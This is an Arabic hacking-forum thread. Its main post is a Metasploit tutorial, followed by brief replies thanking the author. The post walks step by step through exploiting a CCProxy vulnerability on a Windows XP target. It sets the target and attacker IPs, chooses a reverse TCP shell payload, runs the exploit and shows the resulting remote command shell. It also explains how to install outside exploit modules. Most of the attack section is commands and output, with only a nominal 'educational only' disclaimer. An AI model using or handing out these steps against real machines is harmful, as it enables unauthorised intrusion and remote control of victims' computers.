نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] كل ما يتعلق بالميتاسبلوات و الاختراق المتقدم ..بفر افر فلو ..الخ

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 27/08/2011, 05:12   المشاركة رقم: 1
المعلومات
الكاتب:
 yasMouh  
اللقب:
الصورة الرمزية
 
الصورة الرمزية yasMouh

البيانات
التسجيل : Mar 2010
العضوية : 1
الاهتمامات : التطوير
الإقامة : المراهنة , سوق اهراس
المواضيع : 407
الردود : 1259
المجموع : 1,666
بمعدل : 0.28 يوميا
الاختراقات : [yasMouh]
مجتمعنا : [yasMouh]
الصنف : Not Hacker
آخر تواجد : 23/08/2024/21:05
سبب الغياب : السفر
معدل التقييم: 10
نقاط التقييم: 21
yasMouh is on a distinguished road
شكراً: 160
تم شكره 287 مرة في 156 مشاركة

 Algeria


الإتصالات
الحالة:
yasMouh غير متواجد حالياً
وسائل الإتصال:

افتراضي مشروع الـ metasploit .. تاريخه.. تطوره.. طريقة استخدامه..

السلام عليكم ورحمة الله وبركاته

بدأ مشروع ثغرات metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للإستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…

لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلالها و بصراحة ترددت كثيرا عند كتابة هذا الموضوع لأن الاختراق باستخدام مشروع ميتاسبلويت سهل جدا و احترافي لدرجة أننا قد نتمكن من اختراق جميع الأجهزة الموجودة معنا على الشبكة بسهولة و بتطبيق عدة أوامر فقط! و قبل أن أبدأ يجب معرفة أن الشرح للغرض العلمي فقط! و أنا لا أشجع أحد على تجربة ما ذكر هنا خارج نطاق شبكته الخاصة أو بدون اذن مسبق من مدير الشبكة و رغم محاولتي لتفصيل أغلب الخطوات المذكوره في الشرح الا أنه ليس موجه للمبتدئين أو للأشخاص الذين لا يملكون معرفة مسبقة بهذه الأمور و لن يتم التطرق لكيفية تنصيب المشروع على الجهاز فهذه الأشياء يجب أن تكون من البديهيات, سأستخدم سطر الأوامر بشكل أساسي و التطبيق سيكون على نظام Linux توزيعة BackTrack 3 على الاصدار 3.2 من مشروع ميتاسبلويت مع العلم من الممكن تطبيق بعض ما ذكر هنا على نظام ويندوز لكني لا أنصح بذلك!

نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع metasploit في توزيعة BackTrack 4 سيكون المشروع في المسار التالي:

كود:
/pentest/exploits/framework3/

بعد ذلك نقوم بتشغيل سطر أوامر مشروعmetasploit بتنفيذ الأمر:

كود:
./msfconsole


أول ما يبدأ سطر أوامر metasploit يعطينا معلومات عن حالة المشروع مثل الاصدار, عدد الثغرات الموجودة, عدد الأدوات و الـ Payloads و غيرها من الأمور الأخرى مايهمنها حاليا الثغرات فقط و هذا ما سأشرحه هنا. لنتمكن من إستغلال ثغرة metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الإستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:

كود:
msf > help


ما يهمنا حاليا في إستغلال الثغرات هي الأوامر المظللة في الصورة :

كود:
msf > show exploits
msf > info exploit
msf > use exploit


نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها, أول شيء ننفذ الأمر الأول لاستعراض الثغرات الموجودة في المشروع

كود:
msf > show exploits

كما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب و لاظهار معلومات مفصلة عن احدى الثغرات يكفي تنفيذ الأمر info , مثال على ذلك:

كود:
msf > info windows/proxy/ccproxy_telnet_ping

بعد تنفيذ الأمر السابق سيتم اظهار كافة المعلومات المتوفرة عن الثغرة الموجودة في برنامج CCProxy الاصدار 6.2 كما هو واضح في الصورة التالية:

قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن إستغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من إستغلال الثغرة بشكل صحيح, الأن ننفذ الأمر use لنستخدم الثغرة

كود:
msf > use windows/proxy/ccproxy_telnet_ping

و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة
كود:
msf  exploit(ccproxy_telnet_ping) > show options


نحدد الخيارات التي تناسبنا باستخدام الأمر set كما هو واضح من الصورة التالية:

أول شيء أظهرنا خيارات الثغرة باستخدام الأمر السابق ثم حددنا الخيار RHOST وهو IP الجهاز المستهدف و ذلك باستخدام الأمر:
كود:
msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53

بالنسبة لي كان 192.168.0.53 و أبقيت الخيار RPORT نفسه 23 و هو المنفذ الذي يستخدمه برنامج CCProxy بشكل افتراضي و طبعا يمكن تغييره بحسب المنفذ المستخدم مثلا 34 باستخدام الأمر:

كود:
msf  exploit(ccproxy_telnet_ping) > set RPORT 34

بعد ذلك نقوم باظهار الأنظمة المتاحة باستخدام الأمر:

كود:
msf  exploit(ccproxy_telnet_ping) > show targets

نحدد الخيار 4 و هو نظام Windows XP SP2 - English بتنفيذ:

كود:
msf  exploit(ccproxy_telnet_ping) > set TARGET 4

أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر:

كود:
msf  exploit(ccproxy_telnet_ping) > show payloads

بالنسبة لي سأحدد الإستغلال windows/shell_reverse_tcp و يستخدم هذا الإستغلال لانشاء اتصال عكسي مع الجهاز الذي تم تنفيذ الثغرة عليه و نتحكم بالاتصالات من داخل مشروع ميتاسبلويت

كود:
msf  exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp

مع العلم من امكانية تحديد أي إستغلال آخر نريد مثل تنفيذ أمر محدد على النظام, فتح منفذ و الاتصال به عن طريق أداة الـ Netcat, تحميل ملف و تشغيله أو حتى اضافة مستخدم جديد للنظام بصلاحيات Administrator, الأن ننفذ الأمر:


كود:
msf  exploit(ccproxy_telnet_ping) > show options

من جديد لمراجعة الخيارات المخصصة للثغرة أو لتعديل أي خيار مثل ما هو واضح بالصورة التالية:

يمكننا الأن تحديد خيارات الإستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر:


كود:
msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41


بالنسبة لي سأترك المنفذ 4444 نفسه دون تغيير, الأن لم يبقى علينا الا تطبيق الأمر


كود:
msf  exploit(ccproxy_telnet_ping) > exploit


لتنفيذ الثغرة و اذا كانت جميع الخيارات صحيحة سيتم تنفيذ الإستغلال و لنتمكن من مشاهدة الاتصالات العكسية الموجودة ننفذ الأمر:


كود:
msf > sessions -l


Active sessions

Id Description Tunnel

1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032

و من ثم ننفذ الأمر التالي للاتصال باحدى الاتصالات المتاحة و في هذه الحالة هو رقم 1


كود:
msf > sessions -i 1[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>


مع العلم من امكانية تنفيذ أكثر من إستغلال على أكثر من جهاز و الحصول على اتصالات أخرى.. أو القيام بهذه العملية بشكل أوتوماتيكي باستخدام احدى أدوات ميتاسبلويت الخطيرة و هي db_autopwn التي سأترك شرحها لموضوع آخر و طبعا يوجد الكثير من الاستغلالت الأخرى أترك تجربتها لكم.

كل ما ذكر سابقا مجرد مثال بسيط عن احدى ثغرات الميتاسبلويت لكن المشروع أقوى من ذلك بكثير و يوجد له استخدمات و ثغرات أخرى قوية قد أشرحها قريبا ان شاء الله, كل ماعليك الأن هو التجربة و اعادة المحاولة و لا تتوقع أن تتمكن من إستغلال الثغرة من أول مرة أو ثاني مرة و لا حتى بعد 10 مرات كل مرة تجرب بها ثغرة ستكشف شيء جديد و خطأ قمت به و تذكر أن الدقة أهم شيء في إستغلال ثغرات مشروع الميتاسبلويت فتحديد البرنامج و الاصدار المصاب أصعب من إستغلال الثغرة المكتوبة له. من الجميل أيضا في مشروع ميتاسبلويت هو وجود واجهات رسومية جميلة لتسهيل التعامل مع المشروع و مخصصة للأشخاص الذين لايحبون إستخدام سطر الأوامر

الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع metasploit


كود:
./msfgui


الواجهة التي تعمل من المتصفح لتشغيلها ننفذ الأمر التالي داخل مجلد المشروع


كود:
./msfweb



بعد ذلك نفتح المتصفح على الرابط http://127.0.0.1:55555

ماذا بعد؟ لنفرض الآن أننا نريد إستغلال ثغرة غير موجودة في مشروع الميتاسبلويت أحضرناها من موقع Exploit-db مثلا كيف سنضيفها؟ بصراحة وجدت الكثيرين لا يعرفون الطريقة رغم بساطتها و طبعا الشرح للينوكس و نصيحة للجميع ابتعدوا عن ويندوز في هذه الأمور, كما نعرف في الاصدار 2 السابق من مشروعmetasploit كان المشروع وثغراتـه تبرمج بلغة Perl و تأتي بالامتداد pm أما في الاصدار 3 تم اعادة برمجة المشروع من جديد بلغة Ruby و تأتي الثغرة بالامتداد rb لذلك أول شيء علينا معرفة نوعية الثغرة هل هي للاصدار 3.0 أم لاصدارات سابقة 2.0 ؟ أتوقع أن الاختلاف بين الكود البرمجي بين اللغتين واضح جدا (مثال عن ثغرة للاصدار 2 - مثال عن ثغرة للاصدار 3) طبعا الشرح هنا موجه للاصدار 3.0 فهذا مانتكلم عنه في هذا الموضوع, اذا اطلعنا على كود الثغرة و ركزنا على السطر التالي:


class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote


سنعرف أن الثغرة لنظام Windows مصنفة في Driver اسمها Intel_Centrino_2200BG_driver_probe الأن كل ماعلينا هو التوجه للمجلد الموجود في المسار التالي:

كود:
/home/USER/.msf3/

طبعا مع استبدال USER باسم المستخدم عندك في نظام لينوكس و اذا لم يكن المجلد موجود يمكننا انشاؤه ببساطة! أما اذا كنت تعمل بالمستخدم root كما في توزيعة BackTrack سيكون مسار المجلد:


كود:
/root/.msf3



بعد الدخول للمجلد ننشئ مجلد جديد باسم modules بداخله مجلد آخر باسم exploits ليصبح المسار النهائي بهذا الشكل:

كود:
/home/USER/.msf3/modules/exploits


الأن ننشئ بداخل مجلد exploits مجلد باسم windows بداخله مجلد driver بعد ذلك ندخل للمجلد driver و ننشئ ملف الثغرة باسم Intel_Centrino_2200BG_driver_probe متبوعا بالامتداد .rb و بداخله كود الثغرة كامل ليصبح مسار الثغرة النهائي:


كود:
/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb


جميل جدا الأن كل ماعلينا هو تشغيل سطر أوامر مشروع metasploit من جديد و ملاحظة عدد الثغرات قبل و بعد تطبيق ما سبق و سنلاحظ وجود الثغرة ضمن قائمة الثغرات الموجودة في المشروع !

أما اذا أردنا تحديث المشروع بشكل كامل و اضافة ثغرات و أدوات جديدة.. يكفي الدخول لمجلد المشروع و من ثم تطبيق الأمر التالي:


كود:
svn update


في الاخير الشرح هذا مقتبس من عدة مصادر وشروحات
منقول للفائدة



آخر مواضيع » yasMouh

توقيع : yasMouh

من كان أبصر شيئا أو رأى عجبا فإنني عشت دهرا لا أرى عجبا
الناس كالناس والأيام واحدة والدهر كالدهر والدنيا لمن غلبا


[ هناك فرق كبير بين الهاكر والمخترق...
اعرف الكثير من المخترقين لكن قليل منهم من هو هاكر ]



عرض البوم صور yasMouh   رد مع اقتباس
2 أعضاء قالوا شكراً لـ yasMouh على المشاركة المفيدة:
Smail002 (25/07/2012), عربجي محترم (27/08/2011)
قديم 09/01/2012, 13:48   المشاركة رقم: 2
المعلومات
الكاتب:
 ilyas0206=DZ  
اللقب:
.: مشرف قسم الالعاب :.

الإتصالات
الحالة:
ilyas0206=DZ غير متواجد حالياً
وسائل الإتصال:

بار الله فيك أخي الكريم وآصل تمييزك !!!
ي إنتضار جديدك دآئمآ !!!

عرض البوم صور ilyas0206=DZ   رد مع اقتباس
قديم 03/12/2012, 17:40   المشاركة رقم: 3
المعلومات
الكاتب:
 hackers dz  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
hackers dz غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك أخي

معلومات قيمة

عرض البوم صور hackers dz   رد مع اقتباس
قديم 27/12/2012, 19:55   المشاركة رقم: 4
المعلومات
الكاتب:
 love511  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
love511 غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك

عرض البوم صور love511   رد مع اقتباس
قديم 19/04/2013, 20:51   المشاركة رقم: 5
المعلومات
الكاتب:
 yassine  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
yassine غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك اخوي

عرض البوم صور yassine   رد مع اقتباس
قديم 31/05/2013, 02:29   المشاركة رقم: 6
المعلومات
الكاتب:
 anT!-Tr0J4n  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
anT!-Tr0J4n غير متواجد حالياً
وسائل الإتصال:

تجميعة جميلة ومعلومات قيمة بوركت اخى

عرض البوم صور anT!-Tr0J4n   رد مع اقتباس
قديم 02/08/2014, 01:16   المشاركة رقم: 7
المعلومات
الكاتب:
 ال بطيور  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ال بطيور غير متواجد حالياً
وسائل الإتصال:

يارك الله فيك ......

عرض البوم صور ال بطيور   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 98
-elmahdi- , abdou19 , abitu , adelnobel , ALaa AT , algisar , almassiva , amine-997 , amir hide ip , aness07 , anT!-Tr0J4n , an_isma43 , aza , أحمد عبد الله , هلاك السبيعي , BackCover , blandy26 , c41virus , ChAnDiPa-Dz , Code-x HaCkEr , ال بطيور , المجاهد الجزائري , الهاأأكر_الصاأأمت , الصقر الحر 1 , D-hAcKeR-z , Diiga , Docteur Privé , Dr $0uf1 , dr.kasper , DZ-cOmbattant , DZ-VII , dzkabyle , EGY-HACKER , elie doumeth , eqdade , HackDz , hacker-boys , hackers dz , hacker_majnooOoon , hamza 12 , hardTARGET1234 , HaxBacK , HORMA , hyacer , ilyas0206=DZ , دام علاء العماد , jago-dz , jessica.m4 , Kamal , kanoticx , kata23 , killer007001 , lordmaster , love511 , m.mohammed , mafiaboy , mahdi king bob , majood , Malikovinsky , MNR , mohamed22 , mohamed7x , Mr.hisoka , Mr.king18 , nad_hucker , okita0039 , OMar.gtr , سالم الحارثي , pain96 , ping_flood , poster7 , raktama , raouf74 , S4wDz , SaBeR-Dz , samir , savenature , shadoow , silv3r00t , Smail DZ , Smail002 , Sn!per , sniperok , th3nefret , The answer , UnKnown.974 , عمر ليو , عمر الساكر , عازمي هكر , عبد الصمد. , عربجي محترم , ViRuS_OF_AlGeRiA , waxer , yasMouh , yassine , youpi97 , zizou dika , zxcvbnm

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
اختراق حاسوب وتشغيل الكام الخاص بالضحية MEtasploit Algerino89 [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] 21 11/06/2015 16:07
!--[MetaSploit]--! ما هي الميتاسبلويت:- yasMouh [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] 4 05/09/2014 12:05
Metasploit et les failles dans Adobe Reader et Flash Player illuminat [ Section Française ] 4 23/01/2011 23:53
Metasploit 4.0.1 S-japonia33 [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] 5 21/08/2010 20:54
Metasploit Framework 3.4.0 Algerino89 [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] 6 05/08/2010 08:26

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 13:50.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115